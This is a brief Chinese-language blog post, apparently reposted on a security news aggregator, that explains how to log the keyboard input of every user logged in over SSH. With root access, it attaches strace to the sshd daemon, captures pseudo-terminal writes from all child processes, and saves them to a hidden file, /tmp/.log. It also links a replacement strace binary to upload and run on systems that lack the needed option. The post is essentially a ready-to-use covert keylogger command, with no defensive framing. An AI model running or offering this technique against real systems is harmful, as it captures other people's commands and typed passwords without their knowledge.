记录所有ssh登陆用户的输入记录
2021-4-1 19:36:5 Author: guage.cool(查看原文) 阅读量:23 收藏

发布于 

strace

利用strace记录进程的syscall,需要root权限

  • -e trace=write 仅记录write的syscall
  • signal=none 不记录信号相关
  • -f 追踪子进程
  • -P /dev/ptmx 记录虚拟终端的write操作
  • -p 9999 9999为sshd守护进程的PID
  • -o /tmp/.log 记录到文件/tmp/.log
1
strace  -e trace=write -e signal=none -f -P /dev/ptmx -p 9999 -o /tmp/.log

执行效果

input

log

不支持-P的情况

下载此文件,上传执行

strace.zip

许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。


文章来源: https://guage.cool/pty-logger/
如有侵权请联系:admin#unsafe.sh